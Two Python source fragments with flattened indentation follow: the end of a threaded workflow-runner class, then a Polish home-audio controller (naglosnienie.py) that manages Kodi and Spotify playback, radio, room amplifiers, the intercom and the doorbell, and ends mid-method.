def step_breakpoint(self, tid):
"""
Continue a workflow at a task that is paused by a breakpoint
:param tid: workflow task ID with active breakpoint
:type tid: :py:int
"""
task = self.get_task(tid)
if not task.task_metadata.breakpoint.get(default=False):
logging.warn('No active breakpoint set on task {0}'.format(task.key))
return
# Remove the breakpoint
task.task_metadata.breakpoint.set(task.data.value_tag, False)
logging.info('Remove breakpoint on task {0} ({1})'.format(tid, task.key))
def input(self, tid, **kwargs):
"""
Define task input and configuration data
:param tid: task ID to define input for
:type tid: :py:int
:param kwargs: keyword arguments to register as input
"""
task = self.get_task(tid)
task.set_input(**kwargs)
def output(self, tid=None):
"""
Get workflow output
Returns the output associated to all terminal tasks (leaf nodes) of
the workflow or of any intermediate tasks identified by the task ID
:param tid: task ID to return output for
:type tid: :py:int
:rtype: :py:dict
"""
task = self.get_task(tid)
output = {}
if task.status == 'completed':
output = task.get_output()
return output
def run(self, project_dir="./md_workflow", tid=None, validate=True):
"""
Run a workflow specification
Runs the workflow until finished, failed or a breakpoint is reached.
A workflow is a rooted Directed Acyclic Graph (DAG) that is started
from the root node. It can be started from any node relative to the
root as long as its parent(s) are successfully completed.
The workflow will be executed on a different thread allowing for
interactivity with the workflow instance while the workflow is
running.
By default, the workflow specification will be validated using the
`validate` method of the WorkflowSpec class.
:param tid: start the workflow from task ID
:type tid: :py:int
:param validate: Validate the workflow before running it
:type validate: :py:bool
:param project_dir: directory to store task output
:type project_dir: :py:str
"""
# Empty workflow, return
if self.workflow.empty() or not len(self.workflow.query_nodes(format='task')):
logging.info('Workflow contains no tasks')
return
# Start from workflow root by default
tid = tid or self.workflow.root
# Check if tid exists
if tid not in self.workflow.nodes:
raise WorkflowError('Task with tid {0} not in workflow'.format(tid))
# Validate workflow before running?
if validate:
if not validate_workflow(self.workflow):
raise WorkflowError('Workflow validation failed')
# If there are steps that store results locally (store_output == True),
# create a project directory.
self.project_metadata = self.workflow.query_nodes(key='project_metadata')
if any(self.workflow.query_nodes(key="store_output").values()):
self.project_metadata.project_dir.set(self.workflow.data.value_tag,
self.project_metadata.project_dir.get(default=project_dir))
if self.project_metadata.project_dir.exists and self.is_completed:
raise WorkflowError('Directory for finished project exists: {0}'.format(
self.project_metadata.project_dir()))
self.project_metadata.project_dir.makedirs()
else:
self.project_metadata.project_dir.set(self.workflow.data.value_tag, None)
logging.info('Running workflow: {0}, start task ID: {1}'.format(self.project_metadata.title(), tid))
# Set is_running flag. Functions as a thread-safe signal to indicate
# that the workflow is running.
if self.is_running:
logging.warning('Workflow {0} is already running'.format(self.project_metadata.title()))
return
self.is_running = True
# Set workflow start time if not defined. Don't rerun to allow
# continuation of unfinished workflow.
if not self.project_metadata.start_time():
self.project_metadata.start_time.set()
# Spawn a workflow thread
self.workflow_thread = threading.Thread(target=self.run_task, args=[tid])
self.workflow_thread.daemon = True
self.workflow_thread.start()
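# Minimal usage sketch, assuming `workflow_json` is a workflow specification
# built elsewhere with WorkflowSpec; the input keyword and task id below are
# hypothetical:
#
#   runner = WorkflowRunner(workflow=workflow_json)
#   runner.input(runner.workflow.root, dummy_input='value')
#   runner.run(project_dir='./md_workflow')
#   runner.workflow_thread.join()          # wait for the daemon run thread
#   print(runner.output(tid=some_leaf_tid))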
|
naglosnienie.py
|
import datetime
import time
import threading
import THutils
import wzmacniacze
import Kodi
import os
import logging
import liriki
import playlista
import radia
import ulubione
import spotify_odtwarzacz
import spotify_klasa
import constants
from copy import deepcopy
ADRES_KODI = 'http://127.0.0.1:8088/jsonrpc'
CZAS_ODSWIEZANIA_STANU_ODTWARZACZA = 1
LICZBA_ODSWIEZEN_DO_STATUSU = 8
CZAS_PRZERWY_MIEDZY_PROBAMI_ODTWARZANIA = 10  # in seconds
CZAS_WYLACZENIA_PO_NIEAKTYWNOSCI = 10800  # 3 hours, in seconds
# NAZWA_PLIKU_DZWONKA = constants.KATALOG_GLOWNY + '/doorbell.mp3'
# GLOSNOSC_PRZY_DZWONKU = 90
class BiezacyStan:
def __init__(self):
self.totaltime = 0
self.tytul = ''
self.currenttime = 0
self.pauza = True
self.interkom = False
self.nazwa_playlisty = ''
self.ts_playlisty = 0
self.ts_ulubionych = 0
self.ts_wzmacniaczy = 0
self.ts_radii = 0
self.ts_historii = 0
self.ts = 0
self.czy_gra_denon = False
self.czy_aktualnie_gra = False
self.aktualna_pozycja = playlista.PozycjaPlaylisty() # type: playlista.PozycjaPlaylisty
self.percentage = 0
self.ktorykolwiek_wlaczony = False
self.wzmacniacze = {}
self.link = ''
def biezacyStanDoTuple(self):
return {
constants.POLE_INTERKOM: self.interkom,
constants.POLE_CZY_AKTUALNIE_GRA: self.czy_aktualnie_gra,
constants.POLE_PAUZA: self.pauza,
constants.POLE_TIMESTAMP_PLAYLISTY: self.ts_playlisty,
constants.POLE_TIMESTAMP_ULUBIONYCH: self.ts_ulubionych,
constants.POLE_TIMESTAMP_WZMACNIACZY: self.ts_wzmacniaczy,
constants.POLE_TIMESTAMP_RADII: self.ts_radii,
constants.POLE_TIMESTAMP_HISTORII: self.ts_historii,
constants.POLE_TIMESTAMP_NAGLOSNIENIA: self.ts,
constants.POLE_AKTUALNA_POZYCJA: self.aktualna_pozycja.pozycja_do_listy(),
# TODO: remove the link and tytul fields from the current state, they are already in aktualna_pozycja
constants.POLE_TYTUL: self.tytul, constants.POLE_CZY_GRA_DENON: self.czy_gra_denon,
constants.POLE_TOTALTIME: self.totaltime, constants.POLE_CURRENTTIME: self.currenttime,
constants.POLE_PERCENTAGE: self.percentage,
constants.TS: self.ts}
def biezacy_stan_odpowiedzV2(self):
return THutils.skonstruuj_odpowiedzV2OK(constants.RODZAJ_KOMUNIKATU_STAN_NAGLOSNIENIA,
self.biezacyStanDoTuple())
def wzmacniacze_stan_odpowiedzV2(self):
return THutils.skonstruuj_odpowiedzV2OK(constants.RODZAJ_KOMUNIKATU_STAN_WZMACNIACZE,
self.wzmacniacze)
class Naglosnienie:
def __init__(self):
self.logger = logging.getLogger(constants.NAZWA_LOGGERA)
self.logger.info("Zaczynam inicjalizowac Naglosnienie.")
self.wzmacniacze = wzmacniacze.Wzmacniacze(self.logger)
self.odczytaj_konf()
# self.glosnosc_przy_dzwonku = GLOSNOSC_PRZY_DZWONKU
# self.czas_odczytu_konfiguracji = CZAS_ODCZYTU_KONFIGURACJI
#self.plik_dzwonka = ''
self.liryki = liriki.Liriki()
self.ic_trwa = False  # whether the intercom is currently active
self.IC_czy_gralo = False  # True if playback was active before the intercom
self.lock_aktualizacji_statusu = threading.Lock()
self.aktualna_playlista = playlista.Playlista(przy_starcie=True)
self.ulub = ulubione.Ulubione()
self.czas_ostatniego_polecenia_odtwarzania = datetime.datetime.now()
self.katalog_radii = radia.Radia()
self.katalog_radii.pobierz_radia_cyklicznie()
self.biezacy_stan = BiezacyStan()
self.licznik_delay_odswiezania = 0
self._czas_maksymalnego_braku_aktywnosci = CZAS_WYLACZENIA_PO_NIEAKTYWNOSCI
self.spoti = spotify_odtwarzacz.SpotifyOdtwarzacz(self.logger)
self.kodi = Kodi.Kodi(self.logger, ADRES_KODI)
self.odtwarzacz = self.kodi
self.pauza = True
self.czas_ostatniej_aktywnosci = datetime.datetime.now()
#self.notyfikacja_firebase = firebasenotification.Firebasenotification()
self.aktualizuj_status_odtwarzacza()
self.aktualizuj_cyklicznie_stan_odtwarzacza()
self.logger.info('Zakonczylem konstruktora klasy naglosnienie.')
def procesuj_polecenie(self, komenda, parametr1, parametr2):
if komenda == constants.RODZAJ_KOMUNIKATU_ULUBIONE:
return self.ulub.wyslij_ulubione()
elif komenda == constants.RODZAJ_KOMUNIKATU_KATALOG_RADII:
return self.katalog_radii.wyslij_katalog_radii()
elif komenda == constants.RODZAJ_KOMUNIKATU_PLAYLISTA:
return THutils.skonstruuj_odpowiedzV2OK(constants.RODZAJ_KOMUNIKATU_PLAYLISTA,
self.aktualna_playlista.wyslij_playliste(pelna=False))
elif komenda == constants.RODZAJ_KOMUNIKATU_HISTORIA:
            # TODO: move the number of history lines to the parameters
poz = {constants.TS: self.biezacy_stan.ts_historii,
constants.POZYCJE: self.aktualna_playlista.odczytaj_historie()}
return THutils.skonstruuj_odpowiedzV2OK(constants.RODZAJ_KOMUNIKATU_HISTORIA, poz)
elif komenda == constants.RODZAJ_KOMUNIKATU_STAN_WZMACNIACZE:
return THutils.skonstruuj_odpowiedzV2OK(constants.RODZAJ_KOMUNIKATU_STAN_WZMACNIACZE, self.wzmacniacze.do_listy())
elif komenda == 'ST':
if parametr1 == 'AR':
return self.zwroc_status_arduino(parametr2)
        # TODO: rework the Arduino path to use wz_toggle instead of explicit on/off
elif komenda == 'WZ_AR':
if parametr1 == constants.PARAMETR_JEDEN:
self.wlacz_wylacz_wzmacniacz_nazwa(parametr2, True)
else:
self.wlacz_wylacz_wzmacniacz_nazwa(parametr2, False)
self.kasuj_czas_ostatniej_aktywnosci()
return self.zwroc_status_arduino(parametr2)
elif komenda == 'UL_AR':
return self.ulub.arduino_wyslij_ulubione()
elif komenda == 'GL_AR':
if self.wzmacniacze.stan_wzmacniacza_po_nazwie(parametr2):
self.kasuj_czas_ostatniej_aktywnosci()
self.wzmacniacze.set_glosnosc_delta_nazwa(parametr2, int(parametr1))
self.przekaz_stan_wzmacniaczy_do_garazu()
return self.zwroc_status_arduino(parametr2)
        elif komenda == 'GL': # uses a volume delta, not an absolute volume value
self.kasuj_czas_ostatniej_aktywnosci()
self.wzmacniacze.set_glosnosc_delta_nazwa(parametr2, int(parametr1))
self.przekaz_stan_wzmacniaczy_do_garazu()
elif komenda == 'AR_TOGGLE':
self.kasuj_czas_ostatniej_aktywnosci()
self.toggle_wzmacniacz_nazwa(parametr2)
return self.zwroc_status_arduino(parametr2)
elif komenda == 'GLOSN':
try:
glosno = int(parametr1)
self.kasuj_czas_ostatniej_aktywnosci()
self.wzmacniacze.set_glosnosc_nazwa(parametr2, glosno)
self.przekaz_stan_wzmacniaczy_do_garazu()
except ValueError as serr:
self.logger.warning('Podano glosnosc nie jako liczbe: ' + str(parametr1) + ' dla wzmacniacza: ' +
parametr2 + ". Blad: " + str(serr))
elif komenda == 'GLOSN_DELTA':
self.kasuj_czas_ostatniej_aktywnosci()
self.wzmacniacze.set_glosnosc_delta_nazwa(parametr2, int(parametr1))
self.przekaz_stan_wzmacniaczy_do_garazu()
elif komenda == constants.KOMENDA_DZWONEK:
self.logger.info('Dzwonek do drzwi.')
if not self.ic_trwa:
threading.Thread(target=self.odtworz_z_pliku, args=(self.plik_dzwonka,)).start()
#thread.start_new_thread(self.odtworz_z_pliku, (self.plik_dzwonka,))
elif komenda == constants.RODZAJ_KOMUNIKATU_LIRYKI:
#self.liryki.odczytaj_liryki(self.aktualna_playlista.aktualna_pozycja().artist,
# self.aktualna_playlista.aktualna_pozycja().title)
#if lir is not None:
# return THutils.skonstruuj_odpowiedzV2(constants.RODZAJ_KOMUNIKATU_LIRYKI, lir, constants.STATUS_OK)
#else:
# return THutils.skonstruuj_odpowiedzV2(constants.RODZAJ_KOMUNIKATU_LIRYKI, '', constants.STATUS_NOK)
return THutils.skonstruuj_odpowiedzV2OK(constants.RODZAJ_KOMUNIKATU_LIRYKI,
{constants.RODZAJ_KOMUNIKATU_LIRYKI: self.liryki.tekstPiosenki})
elif komenda == 'IC':
if parametr1 == constants.PARAMETR_JEDEN:
self.ic_trwa = True
self.logger.info('Rozpoczynam interkom.')
elif komenda == 'OL':
#thread.start_new_thread(self.odtwarzaj_z_linku_zeruj_playliste, (parametr1, parametr2))
self.odtwarzaj_z_linku_zeruj_playliste(parametr1, parametr2)
elif komenda == 'SPOTIFY':
if parametr1 == 'L+01':
threading.Thread(target=self.aktualna_playlista.dodaj_z_linku_spotify, args=(parametr2,)).start()
#thread.start_new_thread(self.aktualna_playlista.dodaj_z_linku_spotify, (parametr2,))
elif parametr1 == 'OD':
threading.Thread(target=self.odtwarzaj_ze_spotify_uri, args=(parametr2,)).start()
#thread.start_new_thread(self.odtwarzaj_ze_spotify_uri, (parametr2,))
elif komenda == 'QUERY_SPOTIFY':
spot = spotify_klasa.SpotifyKlasa(self.logger)
#odp = spot.zapytanie('', parametr1, parametr2)
odp = spot.szukaj_zdalnie(parametr1, next=parametr2)
#return {constants.RODZAJ_KOMUNIKATU: constants.RODZAJ_KOMUNIKATU_SPOTIFY_QUERY,
# constants.RESULT: odp}
return THutils.skonstruuj_odpowiedzV2OK(constants.RODZAJ_KOMUNIKATU_SPOTIFY_QUERY, odp)
elif komenda == 'SPOTIFY_NEXT':
spot = spotify_klasa.SpotifyKlasa(self.logger)
odp = spot.nastepny(parametr1)
return THutils.skonstruuj_odpowiedzV2OK(constants.RODZAJ_KOMUNIKATU_SPOTIFY_NEXT, odp)
elif komenda == 'SPOTIFY_ROZWINIECIE':
spot = spotify_klasa.SpotifyKlasa(self.logger)
odp = spot.rozwin(parametr1, parametr2)
return THutils.skonstruuj_odpowiedzV2OK(constants.RODZAJ_KOMUNIKATU_SPOTIFY_ROZWIN, odp)
elif komenda == 'RO':
#thread.start_new_thread(self.odtwarzaj_z_radii_po_nazwie, (parametr1, parametr2))
self.odtwarzaj_z_radii_po_nazwie(parametr1, parametr2)
elif komenda == 'RO_ID':
#thread.start_new_thread(self.odtwarzaj_z_radii_po_id, (parametr1, parametr2))
self.odtwarzaj_z_radii_po_id(parametr1, parametr2)
elif komenda == 'OD':
if parametr1 == 'PAUS':
#thread.start_new_thread(self.play_pause, ())
self.play_pause()
elif parametr1 == 'NAST':
#thread.start_new_thread(self.nastepny, ())
self.nastepny()
elif parametr1 == 'POPR':
#thread.start_new_thread(self.poprzedni, ())
self.poprzedni()
elif parametr1 == 'GOTO':
threading.Thread(target=self.idz_do, args=(int(parametr2),)).start()
#thread.start_new_thread(self.idz_do, (int(parametr2),))
elif parametr1 == 'RODZ':
self.aktualna_playlista.jak_odtwarza = int(parametr2)
elif parametr1 == 'LINK':
#thread.start_new_thread(self.odtwarzaj_z_linku_zeruj_playliste, (parametr2, ''))
self.odtwarzaj_z_linku_zeruj_playliste(parametr2, '')
elif parametr1 == 'ULUB':
                # TODO: check which other commands could also drop the separate thread
status_odpowiedzi = self.odtwarzaj_ulubione_numer(int(parametr2))
if status_odpowiedzi == constants.STATUS_OK:
return THutils.skonstruuj_odpowiedzV2OK(constants.RODZAJ_KOMUNIKATU_STAN_NAGLOSNIENIA,
self.biezacy_stan.biezacyStanDoTuple())
else:
return THutils.skonstruuj_odpowiedzV2_NOK('Brak ulubionego o podanym numerze. Odswiez ulubione.')
elif parametr1 == 'ULU-':
#thread.start_new_thread(self.ulub.usun_ulubione, (parametr2,))
self.ulub.usun_ulubione(parametr2)
elif parametr1 == 'ULU+':
threading.Thread(target=self.dodaj_do_playlisty_z_ulubionego, args=(int(parametr2),)).start()
#thread.start_new_thread(self.dodaj_do_playlisty_z_ulubionego, (int(parametr2),))
elif parametr1 == 'HIST':
threading.Thread(target=self.odtworz_z_historii, args=(parametr2,)).start()
#thread.start_new_thread(self.odtworz_z_historii, (parametr2,))
elif parametr1 == 'HIST+':
threading.Thread(target=self.odtworz_z_historii, args=(parametr2, True)).start()
#thread.start_new_thread(self.odtworz_z_historii, (parametr2, True))
else:
pass
elif komenda == 'PL':
if parametr1 == 'ULUB':
pass
elif parametr1 == 'LIS+':
threading.Thread(target=self.ulub.zapisz_playliste_w_ulubionych, args=(self.aktualna_playlista, parametr2)).start()
#thread.start_new_thread(self.ulub.zapisz_playliste_w_ulubionych, (self.aktualna_playlista, parametr2))
elif parametr1 == 'LIST':
pass
elif parametr1 == 'PLAY':
#thread.start_new_thread(self.odtwarzaj_z_playlisty, (int(parametr2),))
self.logger.info('Odtwarzam z playlisty pozycje nr: ' + str(parametr2))
self.odtwarzaj_z_playlisty(nr_poz=int(parametr2))
elif parametr1 == 'L+01':
threading.Thread(target=self.aktualna_playlista.dodaj_z_linku, args=(parametr2, "")).start()
#thread.start_new_thread(self.aktualna_playlista.dodaj_z_linku, (parametr2, ""))
elif parametr1 == 'L-01':
nr_pozycji = int(parametr2)
if self.aktualna_playlista.usun_pozycje_z_playlisty(nr_pozycji):
self.odtwarzaj_z_playlisty()
# elif komenda == 'WZ':
# if parametr2 == constants.PARAMETR_JEDEN:
# self.wlacz_wylacz_wzmacniacz_nazwa(parametr1, True)
# else:
# self.wlacz_wylacz_wzmacniacz_nazwa(parametr1, False)
elif komenda == 'WZ_TOGGLE':
self.toggle_wzmacniacz_nazwa(parametr1)
self.aktualizuj_status_odtwarzacza()
return THutils.skonstruuj_odpowiedzV2OK(constants.RODZAJ_KOMUNIKATU_STAN_NAGLOSNIENIA,
self.biezacy_stan.biezacyStanDoTuple())
def odtworz_z_historii(self, hash_historii, dodaj=False):
# self.logger.info('Odtwarzam z historii, nr hash: ' + str(hash))
hist = self.aktualna_playlista.odczytaj_historie()
poz = None
for a in hist:
if str(a[constants.HASH]) == str(hash_historii):
poz = a
break
if poz:
pozy = self.aktualna_playlista.pozycja_z_json(poz[constants.POZYCJA])
if dodaj:
self.logger.info("Dodaje do playlisty z historii: " + str(poz[constants.POZYCJA]))
self.aktualna_playlista.pozycje.append(pozy)
self.aktualna_playlista.zapisz_playliste()
else:
self.logger.info("Odtwarzam z historii: " + str(poz[constants.POZYCJA]))
self.aktualna_playlista.zeruj()
self.aktualna_playlista.pozycje.append(pozy)
self.aktualna_playlista.zapisz_playliste()
self.odtwarzaj_z_playlisty(zapisuj_historie=False)
else:
self.logger.warning("Nie odnalazlem pozycji historii dla has: " + str(hash_historii))
def odtworz_z_pliku(self, plik, usuwac_plik=False):
self.ic_trwa = True
        # remember the volumes and the current position
self.logger.info('Odtwarzam z pliku: ' + str(plik))
k_stan = self.wzmacniacze.wzmacniacz_po_nazwie(wzmacniacze.NAZWA_WZMACNIACZA_KUCHNIA).stan
k_gl = self.wzmacniacze.wzmacniacz_po_nazwie(wzmacniacze.NAZWA_WZMACNIACZA_KUCHNIA).glosnosc
l_stan = self.wzmacniacze.wzmacniacz_po_nazwie(wzmacniacze.NAZWA_WZMACNIACZA_LAZIENKA).stan
l_gl = self.wzmacniacze.wzmacniacz_po_nazwie(wzmacniacze.NAZWA_WZMACNIACZA_LAZIENKA).glosnosc
t_stan = self.wzmacniacze.wzmacniacz_po_nazwie(wzmacniacze.NAZWA_WZMACNIACZA_TARAS).stan
t_gl = self.wzmacniacze.wzmacniacz_po_nazwie(wzmacniacze.NAZWA_WZMACNIACZA_TARAS).glosnosc
# glosnosci = {}
# for j in self.wzmacniacze.wzmacniacze:
# glosnosci.append(j)
#for j in self.wzmacniacze.wzmacniacze:
# glosnosci.append(j.glosnosc)
percent = int(self.odtwarzacz.percentage)
        # IC_czy_gralo - if True, playback was active before the intercom and should be resumed afterwards
self.IC_czy_gralo = self.wzmacniacze.czy_ktorykolwiek_wlaczony()
self.logger.warning('IC-zlecam stop')
self.stop()
#self.pauza()
licznik = 0
while self.odtwarzacz.aktualnie_gra:
self.logger.warning('IC-jeszcze gra czekam w loopie, do skutku')
self.odtwarzacz.aktualizuj_stan()
time.sleep(0.5)
licznik = licznik + 1
if licznik > 100:
self.logger.warning('IC-licznik przy STOP sie przekrecil')
break
        # while the player is still playing, wait and count to a hundred or more, without time.sleep
self.logger.warning('IC-podmieniam odtwarzacz na KODI')
self.odtwarzacz = self.kodi
        # switch on all amplifiers and set their volumes
for j in self.wzmacniacze.wzmacniacze:
j.ustaw_glosnosc(self.glosnosc_przy_dzwonku)
self.wzmacniacze.wlacz_wylacz_wszystkie(True)
        # play via Kodi; we assume Kodi is already set as the active player
self.odtwarzacz.odtwarzaj_z_linku(plik)
self.odtwarzacz.aktualnie_gra = True
licznik = 0
self.logger.warning('IC-rozpoczynam loop czekania az skonczy odtwarzac')
while self.odtwarzacz.aktualnie_gra:
licznik = licznik + 1
if licznik > 100:
self.logger.warning('IC-licznik przy odtwarzaniu sie przekrecil')
break
time.sleep(2)
self.odtwarzacz.aktualizuj_stan()
self.logger.warning('IC-zakonczylem loop czekania na odwtorzenie dzownka')
        # remove the intercom file
if usuwac_plik:
os.remove(plik)
        # restore the relay states and volumes
'''self.wzmacniacze.wlacz_wylacz_wszystkie(False)
a = 0
for j in self.wzmacniacze.wzmacniacze:
j.ustaw_glosnosc(glosnosci[a])
a = a + 1'''
self.wzmacniacze.wzmacniacz_po_nazwie(wzmacniacze.NAZWA_WZMACNIACZA_KUCHNIA).wlacz_wylacz(k_stan)
self.wzmacniacze.set_glosnosc_nazwa(wzmacniacze.NAZWA_WZMACNIACZA_KUCHNIA, k_gl)
self.wzmacniacze.wzmacniacz_po_nazwie(wzmacniacze.NAZWA_WZMACNIACZA_TARAS).wlacz_wylacz(t_stan)
self.wzmacniacze.set_glosnosc_nazwa(wzmacniacze.NAZWA_WZMACNIACZA_TARAS, t_gl)
self.wzmacniacze.wzmacniacz_po_nazwie(wzmacniacze.NAZWA_WZMACNIACZA_LAZIENKA).wlacz_wylacz(l_stan)
self.wzmacniacze.set_glosnosc_nazwa(wzmacniacze.NAZWA_WZMACNIACZA_LAZIENKA, l_gl)
if self.IC_czy_gralo:
self.logger.warning('IC-gralo poprzednio, odtwarzam z playlisty')
self.odtwarzaj_z_playlisty()
if self.aktualna_playlista.aktualna_pozycja().typ != playlista.TYP_RADIO:
licznik = 0
self.odtwarzacz.aktualizuj_stan()
while not self.odtwarzacz.aktualnie_gra:
time.sleep(0.5)
self.odtwarzacz.aktualizuj_stan()
licznik = licznik + 1
if licznik > 100:
break
self.idz_do(percent)
self.ic_trwa = False
def zwroc_status_arduino(self, nazwa):
if self.wzmacniacze.stan_wzmacniacza_po_nazwie(nazwa):
a = '1'
else:
a = '0'
return 'S' + a + \
'G' + str("{0:0=3d}".format(self.wzmacniacze.wzmacniacz_po_nazwie(nazwa).glosnosc))
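        # Illustrative note: the Arduino status string is 'S' + an on/off flag + 'G' +
        # the volume zero-padded to three digits. For an amplifier that is switched on
        # at volume 95 the expression above evaluates to:
        #     'S' + '1' + 'G' + "{0:0=3d}".format(95)   # -> 'S1G095'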
def aktualizuj_cyklicznie_stan_odtwarzacza(self):
        # TODO: this licznik_delay counter is not needed
if self.licznik_delay_odswiezania == LICZBA_ODSWIEZEN_DO_STATUSU:
self.licznik_delay_odswiezania = 0
else:
self.licznik_delay_odswiezania += 1
if self.wzmacniacze.czy_ktorykolwiek_wlaczony():
self.licznik_delay_odswiezania = 0
if self.licznik_delay_odswiezania == 0:
self.aktualizuj_status_odtwarzacza()
        # play the next track
if not self.ic_trwa:
            # TODO: pause should be equivalent to "no amplifier is switched on"
if self.wzmacniacze.czy_ktorykolwiek_wlaczony() and self.pauza is False:
if not self.odtwarzacz.aktualnie_gra:
                    # the delta prevents asking Kodi every 0.5 s to play the same item again
delta = datetime.datetime.now() - self.czas_ostatniego_polecenia_odtwarzania
if delta.total_seconds() > CZAS_PRZERWY_MIEDZY_PROBAMI_ODTWARZANIA:
self.aktualna_playlista.oblicz_kolejny_do_grania()
threading.Thread(target=self.odtwarzaj_z_playlisty).start()
#for j in self.wzmacniacze.wzmacniacze:
# j.ustaw_glosnosc(j.glosnosc)
self.automatyczne_wylaczanie_przy_braku_aktywnosci()
threading.Timer(CZAS_ODSWIEZANIA_STANU_ODTWARZACZA, self.aktualizuj_cyklicznie_stan_odtwarzacza).start()
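        # The method above re-arms a one-shot threading.Timer on every call, giving a
        # simple ~1 s polling loop (CZAS_ODSWIEZANIA_STANU_ODTWARZACZA). A minimal
        # standalone sketch of the same pattern, with hypothetical names:
        #
        #     import threading
        #     def poll():
        #         refresh_state()                     # hypothetical work function
        #         threading.Timer(1.0, poll).start()  # re-arm the one-shot timer
        #     poll()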
def przekaz_stan_naglosnienia_do_garazu(self, firebase=False):
if firebase:
fire = constants.PARAMETR_JEDEN
else:
fire = constants.PARAMETR_ZERO
THutils.przekaz_polecenie_V2_JSONRPC(constants.get_HOST_I_PORT_GARAZ_v2(),
constants.OBSZAR_STAT,
constants.RODZAJ_KOMUNIKATU_STAN_NAGLOSNIENIA_PUSH_ZE_STRYCHU_NAGLOSN,
self.biezacy_stan.biezacyStanDoTuple(), fire)
def przekaz_stan_wzmacniaczy_do_garazu(self):
THutils.przekaz_polecenie_V2_JSONRPC(constants.get_HOST_I_PORT_GARAZ_v2(),
constants.OBSZAR_STAT,
constants.RODZAJ_KOMUNIKATU_STAN_NAGLOSNIENIA_PUSH_ZE_STRYCHU_WZMACN,
self.wzmacniacze.do_listy(), constants.PARAMETR_JEDEN)
def aktualizuj_status_odtwarzacza(self): #, force_kodi=False):
if self.ic_trwa:
self.logger.warning('Nie aktualizuje stanu odtwarzacza bo trwa IC')
return
przekaz_stan_do_gar = False
fire = False
self.lock_aktualizacji_statusu.acquire()
poprzedni_stan = deepcopy(self.biezacy_stan)
self.odtwarzacz.aktualizuj_stan()
self.biezacy_stan.wzmacniacze = self.wzmacniacze.do_listy()
self.biezacy_stan.interkom = self.ic_trwa
self.biezacy_stan.czy_aktualnie_gra = self.odtwarzacz.aktualnie_gra
self.biezacy_stan.pauza = self.pauza
self.biezacy_stan.nazwa_playlisty = self.aktualna_playlista.nazwa
# self.biezacy_stan.nr_pozycji_na_playliscie = self.aktualna_playlista.nr_pozycji_na_playliscie
self.biezacy_stan.liczba_pozycji_playlisty = self.aktualna_playlista.liczba_pozycji()
self.biezacy_stan.ts_playlisty = self.aktualna_playlista.ts
self.biezacy_stan.ts_ulubionych = self.ulub.ts
self.biezacy_stan.ts_wzmacniaczy = self.wzmacniacze.ts
self.biezacy_stan.ts_radii = self.katalog_radii.ts
self.biezacy_stan.ts_historii = self.aktualna_playlista.ts_historii
tytul = ''
poz = self.aktualna_playlista.aktualna_pozycja() # type: playlista.PozycjaPlaylisty
if poz is not None:
            # TODO: could we always just use self.odtwarzacz.tytul?
if poz.typ == playlista.TYP_RADIO:
if poz.serwis_radiowy == radia.NAZWA_SERWISU_OPENFM:
if poz.ts_stop < int(time.time()):
if self.wzmacniacze.czy_ktorykolwiek_wlaczony():
artysta, album, tytul_utworu, ts_konca = self.katalog_radii.odswiez_co_grane_openfm(poz.id_stacji_radiowej)
poz.album = album
poz.artist = artysta
poz.title = tytul_utworu
tytul = tytul_utworu
                                # avoid reading the "now playing" info too often
if ts_konca < int(time.time()):
poz.ts_stop = int(time.time()) + radia.INTERWAL_ODCZYTU_CO_GRANE
else:
poz.ts_stop = ts_konca
else:
tytul = self.odtwarzacz.tytul
else:
tytul = THutils.xstr(poz.title)
self.biezacy_stan.aktualna_pozycja = poz
self.biezacy_stan.nazwa_playlisty = self.aktualna_playlista.nazwa
        # TODO: remove this variable from the API and the Android app
self.biezacy_stan.czy_gra_denon = False
self.biezacy_stan.totaltime = self.odtwarzacz.totaltime
self.biezacy_stan.currenttime = self.odtwarzacz.currenttime
self.biezacy_stan.percentage = self.odtwarzacz.percentage
a = self.wzmacniacze.czy_ktorykolwiek_wlaczony()
if self.biezacy_stan.czy_aktualnie_gra != poprzedni_stan.czy_aktualnie_gra:
fire = True
self.biezacy_stan.ktorykolwiek_wlaczony = a
if self.biezacy_stan.tytul != tytul:
if not self.ic_trwa:
self.biezacy_stan.tytul = tytul
przekaz_stan_do_gar = True
fire = True
else:
self.biezacy_stan.tytul = tytul
try:
link = self.aktualna_playlista.aktualna_pozycja().link
except AttributeError:
link = ''
try:
if self.biezacy_stan.link != link:
if not self.ic_trwa:
przekaz_stan_do_gar = True
fire = True
except AttributeError:
self.logger.warning("Brak sekcji [aktualna_pozycja]: " + str(self.biezacy_stan.aktualna_pozycja.pozycja_do_listy()))
self.biezacy_stan.link = link
if poprzedni_stan.biezacyStanDoTuple() != self.biezacy_stan.biezacyStanDoTuple():
self.biezacy_stan.ts = int(time.time())
przekaz_stan_do_gar = True
if przekaz_stan_do_gar:
self.przekaz_stan_naglosnienia_do_garazu(firebase=fire)
self.lock_aktualizacji_statusu.release()
def odtwarzaj_ulubione_numer(self, numer_ulubionego):
ul = self.ulub.ulubiony_po_numerze(numer_ulubionego)
if not ul:
self.logger.warning('Odtwarzaj-ulub_numer, nie ma takiego numeru: ' +
str(numer_ulubionego))
return constants.STATUS_NOK
self.kasuj_czas_ostatniej_aktywnosci()
self.stop()
self.aktualna_playlista.inicjalizuj_playliste_z_pliku(ul.get_plik())
self.odtwarzaj_z_playlisty(0)
self.logger.info('Odtwarzam ulubione nr: ' + str(numer_ulubionego) +
" : " + ul.get_nazwa())
return constants.STATUS_OK
def dodaj_do_playlisty_z_ulubionego(self, numer_ulubionego):
ul = self.ulub.ulubiony_po_numerze(numer_ulubionego)
if not ul:
self.logger.warning('Dodaj-ulub_numer, nie ma takiego numeru: ' +
str(numer_ulubionego))
return
#if ul.typ == playlista.TYP_RADIO:
# return
self.kasuj_czas_ostatniej_aktywnosci()
self.aktualna_playlista.inicjalizuj_playliste_z_pliku(ul.get_plik(), zeruj=False)
def odtwarzaj_z_radii_po_id(self, nazwa_serwisu, idstacji):
self.logger.info('Odtwarzam z radii: ' + nazwa_serwisu + ' ' + str(idstacji))
a = self.katalog_radii.znajdz_stacje_po_nazwie_i_id(nazwa_serwisu, idstacji)
if not a:
self.logger.warning('Nie odnalazlem takiego radia po id: ' + nazwa_serwisu + ' ' + idstacji)
return
self.odtwarzaj_z_radii(a)
def odtwarzaj_z_radii_po_nazwie(self, nazwa_serwisu, nazwa_stacji):
self.logger.info('Odtwarzam z radii: ' + nazwa_serwisu + ' ' + nazwa_stacji)
a = self.katalog_radii.znajdz_stacje_po_nazwie_i_serwisie(nazwa_serwisu, nazwa_stacji)
if not a:
self.logger.warning('Nie odnalazlem takiego radia: ' + nazwa_serwisu + ' ' + nazwa_stacji)
return
self.odtwarzaj_z_radii(a)
def odtwarzaj_z_radii(self, radio):
